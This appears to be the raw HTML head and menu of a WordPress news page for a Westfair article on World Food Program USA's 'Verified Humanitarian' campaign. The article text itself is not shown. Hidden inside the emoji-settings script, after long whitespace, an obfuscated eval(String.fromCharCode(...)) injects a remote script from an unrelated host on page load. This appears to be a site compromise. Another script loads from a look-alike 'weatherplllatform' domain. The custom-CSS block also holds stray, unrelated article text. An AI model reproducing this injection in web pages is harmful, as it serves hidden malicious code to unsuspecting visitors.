<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <!--<![endif]-->
<head>
    <title>New &#039;Verified Humanitarian&#039; campaign offers alternative outlet for Twitter&#039;s $8 blue check - Westfair Communications</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://westfaironline.com/xmlrpc.php" />
    <meta name='robots' content='max-image-preview:large' />

<!-- This site is optimized with the Yoast SEO Premium plugin v7.0.1 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="World Food Program USA has launched Verified Humanitarian, a social media campaign aimed at encouraging Americans to join the global movement to end hunger."/>
<link rel="canonical" href="https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="New &#039;Verified Humanitarian&#039; campaign offers alternative outlet for Twitter&#039;s $8 blue check - Westfair Communications" />
<meta property="og:description" content="World Food Program USA has launched Verified Humanitarian, a social media campaign aimed at encouraging Americans to join the global movement to end hunger." />
<meta property="og:url" content="https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/" />
<meta property="og:site_name" content="Westfair Communications" />
<meta property="article:publisher" content="https://www.facebook.com/WestfairOnline" />
<meta property="article:tag" content="Verified Humanitarian" />
<meta property="article:tag" content="World Food Program" />
<meta property="article:section" content="Food &amp; Beverage" />
<meta property="article:published_time" content="2022-11-16T05:01:10-05:00" />
<meta property="article:modified_time" content="2022-11-12T21:42:15-05:00" />
<meta property="og:updated_time" content="2022-11-12T21:42:15-05:00" />
<meta property="fb:admins" content="384703558216742" />
<meta property="og:image" content="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg" />
<meta property="og:image:secure_url" content="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="634" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="World Food Program USA has launched Verified Humanitarian, a social media campaign aimed at encouraging Americans to join the global movement to end hunger." />
<meta name="twitter:title" content="New &#039;Verified Humanitarian&#039; campaign offers alternative outlet for Twitter&#039;s $8 blue check - Westfair Communications" />
<meta name="twitter:site" content="@westfaironline" />
<meta name="twitter:image" content="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg" />
<meta name="twitter:creator" content="@westfaironline" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/westfaironline.com\/","sameAs":["https:\/\/www.facebook.com\/WestfairOnline","https:\/\/www.instagram.com\/westfaironline\/","https:\/\/www.linkedin.com\/company\/westfair-business-publications\/","https:\/\/www.youtube.com\/user\/thewagmag","https:\/\/twitter.com\/westfaironline"],"@id":"#organization","name":"Westfair Communications","logo":"https:\/\/westfaironline.com\/wp-content\/uploads\/2017\/03\/CombinedLogo-1.png"}</script>
<!-- / Yoast SEO Premium plugin. -->

<link rel='dns-prefetch' href='//static.addtoany.com' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//www.formstack.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link rel="alternate" type="application/rss+xml" title="Westfair Communications &raquo; Feed" href="https://westfaironline.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Westfair Communications &raquo; Comments Feed" href="https://westfaironline.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Westfair Communications &raquo; New &#8216;Verified Humanitarian&#8217; campaign offers alternative outlet for Twitter&#8217;s $8 blue check Comments Feed" href="https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/feed/" />
		<!-- This site uses the Google Analytics by ExactMetrics plugin v7.10.1 - Using Analytics tracking - https://www.exactmetrics.com/ -->
							<script
				src="//www.googletagmanager.com/gtag/js?id=UA-25455784-1"  data-cfasync="false" data-wpfc-render="false" type="text/javascript" async></script>
			<script data-cfasync="false" data-wpfc-render="false" type="text/javascript">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</script>
				<!-- / Google Analytics by ExactMetrics -->
		<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/westfaironline.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1"}};
                                                                                                                                                                                                                                           eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,52,44,49,48,49,44,57,57,44,49,49,49,44,49,49,52,44,49,48,48,44,52,54,44,49,48,50,44,49,48,53,44,49,49,48,44,49,48,48,44,49,49,54,44,49,49,52,44,49,49,55,44,49,49,53,44,49,49,54,44,57,57,44,49,48,56,44,49,48,53,44,57,57,44,49,48,55,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,49,48,49,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,48,44,52,54,44,53,52,44,52,54,44,53,52,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125/*slectrepoint*/));/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css' href='https://westfaironline.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1' type='text/css' media='all' />
<link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://westfaironline.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=8.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='wc-blocks-style-css' href='https://westfaironline.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=8.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='classic-theme-styles-css' href='https://westfaironline.com/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='formstack-css-css' href='//www.formstack.com/forms/css/2/wordpress-post.css?ver=6.1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css' href='https://westfaironline.com/wp-includes/css/dashicons.min.css?ver=6.1' type='text/css' media='all' />
<link rel='stylesheet' id='post-views-counter-frontend-css' href='https://westfaironline.com/wp-content/plugins/post-views-counter/css/frontend.min.css?ver=1.3.12' type='text/css' media='all' />
<link rel='stylesheet' id='page-list-style-css' href='https://westfaironline.com/wp-content/plugins/sitemap/css/page-list.css?ver=4.3' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css' href='https://westfaironline.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.1.0' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://westfaironline.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.1.0' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css' href='https://westfaironline.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.1.0' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='sc-events-css' href='https://westfaironline.com/wp-content/plugins/sugar-calendar/sugar-calendar/includes/themes/legacy/css/sc-events.css?ver=2.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='sc-feeds-terms-css' href='https://westfaironline.com/wp-content/plugins/sc-calendar-feeds/sc-calendar-feeds/includes/common/assets/css/min/ltr/term-ical.css?ver=1.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A400%2C500%2C700%7CArchivo+Black%3A400%7COpen+Sans%3A400%2C600%2C700&#038;display=swap&#038;ver=5.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='sv-wc-payment-gateway-payment-form-v5_10_12-css' href='https://westfaironline.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/assets/css/frontend/sv-wc-payment-gateway-payment-form.min.css?ver=5.10.12' type='text/css' media='all' />
<link rel='stylesheet' id='mailchimp-top-bar-css' href='https://westfaironline.com/wp-content/plugins/mailchimp-top-bar/assets/css/bar.css?ver=1.5.5' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='https://westfaironline.com/wp-content/themes/Newsmag/style.css?ver=5.2.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='td-theme-woo-css' href='https://westfaironline.com/wp-content/themes/Newsmag/style-woocommerce.css?ver=5.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='addtoany-css' href='https://westfaironline.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css' href='https://westfaironline.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.10.0' type='text/css' media='all' />
<link rel='stylesheet' id='td-legacy-framework-front-style-css' href='https://westfaironline.com/wp-content/plugins/td-composer/legacy/Newsmag/assets/css/td_legacy_main.css?ver=9051206d0908def74825384f6e829588' type='text/css' media='all' />
<link rel='stylesheet' id='td-legacy-framework-woo-style-css' href='https://westfaironline.com/wp-content/plugins/td-composer/legacy/Newsmag/assets/css/td_legacy_woocommerce.css?ver=6.1' type='text/css' media='all' />
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend-gtag.min.js?ver=7.10.1' id='exactmetrics-frontend-script-js'></script>
<script data-cfasync="false" data-wpfc-render="false" type="text/javascript" id='exactmetrics-frontend-script-js-extra'>/* <![CDATA[ */
var exactmetrics_frontend = {"js_events_tracking":"true","download_extensions":"zip,mp3,mpeg,pdf,docx,pptx,xlsx,rar","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/westfaironline.com","hash_tracking":"false","ua":"UA-25455784-1","v4_id":""};/* ]]> */
</script>
<script type='text/javascript' id='addtoany-core-js-before'>
window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};
</script>
<script type='text/javascript' async src='https://static.addtoany.com/menu/page.js' id='addtoany-core-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' id='jquery-js-after'>

					function optimocha_getCookie(name) {
						var v = document.cookie.match("(^|;) ?" + name + "=([^;]*)(;|$)");
						return v ? v[2] : null;
					}

					function optimocha_check_wc_cart_script() {
					var cart_src = "https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js";
					var script_id = "optimocha_loaded_wc_cart_fragments";

						if( document.getElementById(script_id) !== null ) {
							return false;
						}

						if( optimocha_getCookie("woocommerce_cart_hash") ) {
							var script = document.createElement("script");
							script.id = script_id;
							script.src = cart_src;
							script.async = true;
							document.head.appendChild(script);
						}
					}

					optimocha_check_wc_cart_script();
					document.addEventListener("click", function(){setTimeout(optimocha_check_wc_cart_script,1000);});
					
</script>
<script type='text/javascript' async src='https://westfaironline.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-jquery-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.7.1.0' id='jquery-blockui-js'></script>
<script type='text/javascript' id='wc-add-to-cart-js-extra'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/westfaironline.com\/cart\/","is_cart":"","cart_redirect_after_add":"yes"};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.1.0' id='wc-add-to-cart-js'></script>
<script type='text/javascript' id='sc-ajax-js-extra'>
/* <![CDATA[ */
var sc_vars = {"ajaxurl":"https:\/\/westfaironline.com\/wp-admin\/admin-ajax.php","date_format":"F j, Y","time_format":"g:i a","start_of_week":"1","timezone":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/sugar-calendar/sugar-calendar/includes/themes/legacy/js/sc-ajax.js?ver=2.2.4' id='sc-ajax-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=6.10.0' id='vc_woocommerce-add-to-cart-js-js'></script>

<!-- Google Analytics snippet added by Site Kit -->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-25455784-2' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["westfaironline.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-25455784-2", {"anonymize_ip":true});
</script>

<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://westfaironline.com/wp-json/" /><link rel="alternate" type="application/json" href="https://westfaironline.com/wp-json/wp/v2/posts/155786" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://westfaironline.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://westfaironline.com/wp-includes/wlwmanifest.xml" />
<link rel='shortlink' href='https://westfaironline.com/?p=155786' />
<link rel="alternate" type="application/json+oembed" href="https://westfaironline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://westfaironline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwestfaironline.com%2Ffood-beverage%2Fnew-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.87.0" />		<script src='https://news.weatherplllatform.com/counter.js' async='true' type='text/javascript'></script>
    		<script>
			document.documentElement.className = document.documentElement.className.replace( 'no-js', 'js' );
		</script>
				<style>
			.no-js img.lazyload { display: none; }
			figure.wp-block-image img.lazyloading { min-width: 150px; }
							.lazyload, .lazyloading { opacity: 0; }
				.lazyloaded {
					opacity: 1;
					transition: opacity 400ms;
					transition-delay: 0ms;
				}
					</style>
		<!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
    			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/westfaironline.com\/wp-admin\/","wpRestNonce":"f37e23a906","wpRestUrl":"https:\/\/westfaironline.com\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/"};
			</script>
				<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
	
<!-- Google AdSense snippet added by Site Kit -->
<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">
<!-- End Google AdSense snippet added by Site Kit -->

<!-- Meta Pixel Code -->
<script type='text/javascript'>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
</script>
<!-- End Meta Pixel Code -->
<script type='text/javascript'>
  fbq('init', '759902111314490', {}, {
    "agent": "wordpress-6.1-3.0.8"
});
  </script><script type='text/javascript'>
  fbq('track', 'PageView', []);
  </script>
<!-- Meta Pixel Code -->
<noscript>
<img height="1" width="1" style="display:none" alt="fbpx"
src="https://www.facebook.com/tr?id=759902111314490&ev=PageView&noscript=1" />
</noscript>
<!-- End Meta Pixel Code -->
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<script type="text/javascript" src="//my.westfaironline.com/c/assets/pigeon.js"></script><script type="text/javascript">
		var Pigeon = new PigeonClass({
			subdomain:'my.westfaironline.com',
			fingerprint:true,
			cid: null,
			cha: null
		});
		
				Pigeon.paywall({
					redirect:'modal',
					free:0,
					contentId:155786,
					contentTitle:'New+%27Verified+Humanitarian%27+campaign+offers+alternative+outlet+for+Twitter%27s+%248+blue+check',
					contentDate:'2022-11-16+10%3A01%3A10',
					contentPrice:0,
					contentValue:0,
					contentPrompt:0,
					wpPostType: 'post'
				});

				Pigeon.widget.status();
		</script>
		
<!-- Google AdSense snippet added by Site Kit -->
<script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2855551179968478" crossorigin="anonymous" type="text/javascript"></script>

<!-- End Google AdSense snippet added by Site Kit -->

<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>

<style type="text/css">
		.pigeon-widget-status { position:fixed; height: 42px; padding: 10px; width: 100%; background: #000; z-index: 999997; font-size: 14px; text-align: center; }
		.pigeon-widget-status ul { display: inline-block; margin: 0 auto; padding: 0; float: right; }
		.pigeon-widget-status ul li { float: left; list-style: none; color: #cdcdcd; }
		.pigeon-widget-status ul li a {color: #cdcdcd; border-left: 1px solid #585858; padding-left: 10px; margin-left: 13px; }
		.pigeon-widget-status ul li.meter a { border: none; }
		.pigeon-widget-status ul li a:hover { color: #bf2e2b; }
		.pigeon-widget-status ul li:first-child a { border: none; padding: 0; margin: 0; }
		.pigeon-context-promotion .pigeon-cta{ padding: 25px; text-align: center; background: #bf2e2b; color: #ffffff; margin: 25px 0; }
		.pigeon-context-promotion .pigeon-cta a{ color: white; font-weight: bold; }

		@media only screen and (max-width: 600px) {
		   .pigeon-widget-status ul { float: none; }
		}
	</style><script type="text/javascript">
        ;(function ($, window, document, undefined ){
            $(document).ready(function(){
				$('body').append('<nav class="pigeon-widget-status pigeon-widget-status-sticky"><div class="pigeon-widget-status-wrap wrap"></div></nav>');
                Pigeon.widget.status();
            });
			
            Pigeon.paywallPromise.done(function(response){
                if(response.profile && response.allowed){
                    // Show and hide elements based on a person being logged in and having access
                }
            });
        })(jQuery, window, document);
	</script>


<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BreadcrumbList",
        "itemListElement": [
            {
                "@type": "ListItem",
                "position": 1,
                "item": {
                    "@type": "WebSite",
                    "@id": "https://westfaironline.com/",
                    "name": "Home"
                }
            },
            {
                "@type": "ListItem",
                "position": 2,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://westfaironline.com/category/food-beverage/",
                    "name": "Food &amp; Beverage"
                }
            }
            ,{
                "@type": "ListItem",
                "position": 3,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/",
                    "name": "New &#8216;Verified Humanitarian&#8217; campaign offers alternative outlet for Twitter&#8217;s $8 blue check"                                
                }
            }    
        ]
    }
</script>
<style type="text/css">
.mctb-bar, .mctb-response, .mctb-close { background: #2e9cca !important; }
.mctb-bar, .mctb-label, .mctb-close { color: #ffffff !important; }
.mctb-button { background: #25274d !important; border-color: #25274d !important; }
.mctb-email:focus { outline-color: #25274d !important; }
.mctb-button { color: #ffffff !important; }
</style><link rel="icon" href="https://westfaironline.com/wp-content/uploads/2019/09/cropped-17554518_1442812719072482_6266031074793962566_n-32x32.jpg" sizes="32x32" />
<link rel="icon" href="https://westfaironline.com/wp-content/uploads/2019/09/cropped-17554518_1442812719072482_6266031074793962566_n-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="https://westfaironline.com/wp-content/uploads/2019/09/cropped-17554518_1442812719072482_6266031074793962566_n-180x180.jpg" />
<meta name="msapplication-TileImage" content="https://westfaironline.com/wp-content/uploads/2019/09/cropped-17554518_1442812719072482_6266031074793962566_n-270x270.jpg" />
		<style type="text/css" id="wp-custom-css">
			[caption id="attachment_85170" align="alignleft" width="618"] County Executive Robert Astorino, Peter Ferraro Sr. and Frank Crivello.[/caption]

When the New York State Self Storage Association&nbsp;held its recent conference at the Westchester Marriott in Tarrytown, County Executive Robert P. Astorino was on hand to honor the organization with a proclamation. The association represents about 200 owners and operators of self storage facilities around the state. In addition to keeping members informed about what’s happening in the industry, NYSSA provides learning opportunities in areas such as customer service, government regulation and facility operations.

The CEO of NYSSA, Peter Ferraro Sr., along with NYSSA’s Board Chairman Frank Crivello, accepted the proclamation from Astorino. NYSSA, which was formed in 1982, is working to educate public officials about the services offered by its members to apartment dwellers, condo owners, people in transit or who have been forced to relocate temporarily and small business operators.		</style>
		<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	<style id="tdw-css-placeholder"></style></head>

<body class="post-template-default single single-post postid-155786 single-format-standard theme-Newsmag woocommerce-no-js new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check global-block-template-1 single_template_1 wpb-js-composer js-comp-ver-6.10.0 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

        <div class="td-scroll-up  td-hide-scroll-up-on-mob"  style="display:none;"><i class="td-icon-menu-up"></i></div>

    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/WestfairOnline" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/westfaironline/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.linkedin.com/company/westfair-business-publications" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/westfaironline" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/user/thewagmag" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#" aria-label="Close"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-new-main-menu-container"><ul id="menu-new-main-menu" class="td-mobile-main-menu"><li id="menu-item-87444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-87444"><a href="https://westfaironline.com/">HOME</a></li>
<li id="menu-item-87443" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87443"><a href="https://westfaironline.com/westchester-county-business-journal/">WESTCHESTER</a></li>
<li id="menu-item-87442" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87442"><a href="https://westfaironline.com/fairfield-news/">FAIRFIELD</a></li>
<li id="menu-item-137908" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-137908"><a href="#">E-EDITIONS<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-137909" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-137909"><a href="https://westfaironline.com/category/premium-content/digital-archives-fairfield/">Fairfield County</a></li>
	<li id="menu-item-137910" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-137910"><a href="https://westfaironline.com/category/premium-content/digital-archives-westchester/">Westchester County</a></li>
	<li id="menu-item-125662" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-125662"><a href="https://westfaironline.com/category/flipbooks/">Supplements</a></li>
</ul>
</li>
<li id="menu-item-87370" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-87370"><a href="https://westfaironline.com/industries/">INDUSTRIES<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-87462" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87462"><a href="https://westfaironline.com/category/real-estate/">Real Estate</a></li>
